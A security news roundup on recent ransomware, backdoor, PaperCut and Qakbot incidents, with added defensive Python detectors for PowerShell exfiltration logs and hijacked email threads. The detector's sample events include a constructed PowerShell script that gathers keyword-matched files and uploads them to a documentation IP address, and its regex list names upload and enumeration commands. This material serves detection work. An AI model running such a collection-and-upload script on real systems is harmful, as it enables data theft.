Over the weekend NCR, one of the largest payment solutions providers, confirmed that the data center hosting its Aloha POS (point-of-sale) software had been hit by a ransomware attack. The BlackCat/ALPHV ransomware group claimed responsibility and stated that, rather than the data stored on the Aloha servers, it had taken the client credentials, which it threatened to publish on its leak site if a ransom was not paid.
Custom PowerShell tool allowing threat actors to silently exfiltrate data
Researchers have identified several instances of the Vice Society ransomware group using a custom PowerShell script to exfiltrate data from a victim's system without triggering alerts. The script launches a series of background jobs that walk the directories on an inclusion list, match file and directory names against a keyword list, and skip files smaller than 10KB. By narrowing the selection to a small set of files and criteria, it keeps its footprint on the device low enough to avoid detection and takes only the data the threat actors deem valuable. Because the tooling is built-in PowerShell rather than a dropped binary, script block logging is the record most likely to capture it.
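The detection angle a defender wants here is to look at PowerShell script block logs for the combination of behaviours described above: background jobs, recursive enumeration, a keyword filter, a minimum-size filter and an outbound upload. The example below is added to this article and is not Vice Society's script or the researchers' signatures; the indicator regexes are my own generic approximations, and the log records are constructed to mimic the fields of Windows event 4104 (script block logging). It reassembles script blocks that the event log split into several chunks before classifying them, since a long script rarely arrives in one event.

```python
import re
from collections import defaultdict

# Generic indicator classes for the behaviour described above. These regexes are
# my own approximations, not signatures from the published analysis.
INDICATORS = {
    "jobs": re.compile(r"\b(Start-Job|Start-ThreadJob)\b|\bInvoke-Command\b[^\n]*-AsJob", re.I),
    "enumerate": re.compile(r"\b(Get-ChildItem|gci|ls|dir)\b[^\n]*-Recurse", re.I),
    "keyword_filter": re.compile(r"\.(Name|FullName)\s+-(match|like|in)\b", re.I),
    "size_filter": re.compile(r"\.Length\s+-(gt|ge)\s+(\d+\s*KB|\d{4,})", re.I),
    "exfil": re.compile(
        r"\b(Invoke-WebRequest|Invoke-RestMethod|UploadFile|UploadData|WebClient|HttpClient)\b", re.I),
}

# Constructed records shaped like event 4104 fields (ScriptBlockId, MessageNumber,
# MessageTotal, ScriptBlockText). 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 1,   # routine log cleanup
     "ScriptBlockText": r"Get-ChildItem C:\Logs -Recurse -File | Where-Object "
                        r"{ $_.LastWriteTime -lt (Get-Date).AddDays(-30) } | Remove-Item"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 2,   # collection stage
     "ScriptBlockText": r"$keys = @('invoice','passw','contract'); "
                        r"$dirs = Get-Content C:\Users\Public\dirs.txt; foreach ($d in $dirs) { "
                        r"Start-Job -ScriptBlock { param($p) Get-ChildItem -Path $p -Recurse -File | "
                        r"Where-Object { $_.Length -gt 10KB -and $_.Name -match ($using:keys -join '|') } } "
                        r"-ArgumentList $d }"},
    {"ScriptBlockId": "b2", "MessageNumber": 2, "MessageTotal": 2,   # upload stage, same block
     "ScriptBlockText": r"Get-Job | Wait-Job | Receive-Job | ForEach-Object { "
                        r"(New-Object System.Net.WebClient).UploadFile('http://198.51.100.7/up', $_.FullName) }"},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,   # backup job: two hits, not enough
     "ScriptBlockText": r"Get-ChildItem D:\Backups -Recurse -File | Where-Object { $_.Length -gt 10240 } | "
                        r"Compress-Archive -DestinationPath D:\old.zip"},
]


def assemble_script_blocks(records):
    """Rejoin 4104 chunks by ScriptBlockId, in MessageNumber order, into full script text."""
    parts = defaultdict(list)
    for r in records:
        parts[r["ScriptBlockId"]].append((r["MessageNumber"], r["ScriptBlockText"]))
    return {sbid: "\n".join(text for _, text in sorted(chunks)) for sbid, chunks in parts.items()}


def classify(script_text):
    """Return the set of indicator classes present in one reassembled script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_text)}


def find_suspicious(records, min_categories=3):
    """Flag script blocks that combine at least min_categories indicator classes.

    Any single class is common in admin scripts; it is the combination of
    enumerate + filter + upload (plus jobs) that matches the exfiltration pattern.
    """
    blocks = assemble_script_blocks(records)
    hits = {sbid: classify(text) for sbid, text in blocks.items()}
    return {sbid: sorted(cats) for sbid, cats in hits.items() if len(cats) >= min_categories}


if __name__ == "__main__":
    for sbid, cats in find_suspicious(SAMPLE_EVENTS).items():
        print(f"suspicious script block {sbid}: {', '.join(cats)}")
```

The threshold is deliberately a count of distinct behaviours rather than a single keyword, so the backup script (enumeration plus a size filter) stays below it while the two-chunk collection-and-upload block trips all five classes. In a real deployment the same logic would run over `Microsoft-Windows-PowerShell/Operational` events grouped by ScriptBlockId and process.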
Domino backdoor draws inspiration from multiple threat groups
A new backdoor that researchers have named 'Domino' appears to have connections to both the FIN7 APT (Advanced Persistent Threat) group and former members of the Conti ransomware group. Domino reuses a significant amount of code and functionality from the Lizar malware family, which was originally tied to FIN7 and has been actively deployed for several years. More recently, Domino has been observed being delivered by Dave Loader, a loader developed and maintained by former Conti members and used to deploy ransomware payloads.
PaperCut software warns users of RCE vulnerability
PaperCut, the print management software vendor, has begun contacting customers about a remote code execution (RCE) vulnerability in its software that could let an attacker gain a foothold on the network. The company is urging all users to update to the latest versions to close off unauthorized access, while acknowledging that it is up to system administrators to investigate their own networks for suspicious activity. Patching closes the entry point but does not evict anyone who has already used it, so a server that was exposed before the update should be checked for signs of compromise rather than simply upgraded.
Qakbot campaign uses fake business emails
The latest campaign from the prolific Qakbot banking trojan has been spotted hijacking business email threads: the attacker replies into an existing conversation and posts messages carrying malicious PDF attachments. The reply keeps the previous sender's display name but swaps in a different email address, counting on the victim trusting the familiar thread enough to open the PDF, which launches the malicious scripts. Beyond the delivery method, this Qakbot campaign behaves like previous ones, quickly extracting stored credentials and dropping additional malware payloads.
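The tell in the thread hijack described above is structural: a reply that references a message we already hold, whose From display name matches an earlier participant but whose address does not. The example below is added to this article and is not part of the original or of any published Qakbot detection; the three messages are constructed with Python's standard `email` package (the "PDF" attachment is a placeholder byte string, not a real document), and the check uses only the `In-Reply-To`/`References` headers and the `From` header of the reply.

```python
from email import message_from_string, policy
from email.message import EmailMessage
from email.utils import parseaddr


def _build(from_hdr, to_hdr, subject, body, msg_id, in_reply_to=None, pdf_name=None):
    """Construct a raw RFC 5322 message (sample data for this example only)."""
    m = EmailMessage()
    m["From"] = from_hdr
    m["To"] = to_hdr
    m["Subject"] = subject
    m["Message-ID"] = msg_id
    if in_reply_to:
        m["In-Reply-To"] = in_reply_to
        m["References"] = in_reply_to
    m.set_content(body)
    if pdf_name:
        # Placeholder bytes standing in for an attachment; not a real PDF.
        m.add_attachment(b"%PDF-1.4 constructed placeholder", maintype="application",
                         subtype="pdf", filename=pdf_name)
    return m.as_string()


# Constructed thread: an original, a genuine reply, and a hijacked reply that keeps
# the display name "Alice Smith" but comes from a look-alike domain.
ORIGINAL = _build("Alice Smith <alice.smith@example.com>", "bob@example.org",
                  "Q2 contract renewal", "Hi Bob, terms as discussed.", "<thread-1@example.com>")
LEGIT_REPLY = _build("Alice Smith <alice.smith@example.com>", "bob@example.org",
                     "RE: Q2 contract renewal", "Updated figures attached.",
                     "<thread-2@example.com>", "<thread-1@example.com>", "terms_v2.pdf")
HIJACK = _build("Alice Smith <alice.smith@example-docs.net>", "bob@example.org",
                "RE: Q2 contract renewal", "Please review the attached file.",
                "<x9@example-docs.net>", "<thread-1@example.com>", "Document_4471.pdf")


def index_known_senders(raw_messages):
    """Map Message-ID -> (display name, address) for mail already in the mailbox."""
    known = {}
    for raw in raw_messages:
        m = message_from_string(raw, policy=policy.default)
        known[str(m["Message-ID"]).strip()] = parseaddr(str(m["From"]))
    return known


def thread_sender_mismatch(raw_reply, known):
    """Return details if the reply reuses a known participant's name from a new address.

    Returns None when the message is not a reply into a known thread, or when the
    name/address pair matches what the thread already established.
    """
    m = message_from_string(raw_reply, policy=policy.default)
    refs = set(str(m.get("References", "")).split()) | {str(m.get("In-Reply-To", "")).strip()}
    refs.discard("")
    prior = [known[r] for r in refs if r in known]
    if not prior:
        return None
    name, addr = parseaddr(str(m["From"]))
    pdfs = [att.get_filename() for att in m.iter_attachments()
            if att.get_content_type() == "application/pdf"]
    for prior_name, prior_addr in prior:
        if name.casefold() == prior_name.casefold() and addr.casefold() != prior_addr.casefold():
            return {"claimed_name": name, "reply_addr": addr,
                    "thread_addr": prior_addr, "pdf_attachments": pdfs}
    return None


if __name__ == "__main__":
    known = index_known_senders([ORIGINAL])
    for label, raw in (("legit", LEGIT_REPLY), ("hijack", HIJACK)):
        print(label, thread_sender_mismatch(raw, known))
```

This is a triage signal, not a verdict: people do legitimately reply from a second address, so the result should raise the bar for attachment handling (sandbox the PDF, warn the recipient) rather than block outright. It also only catches the variant the article describes, where the address is swapped; if the reply is sent from the genuinely compromised mailbox, name and address both match and a different control is needed.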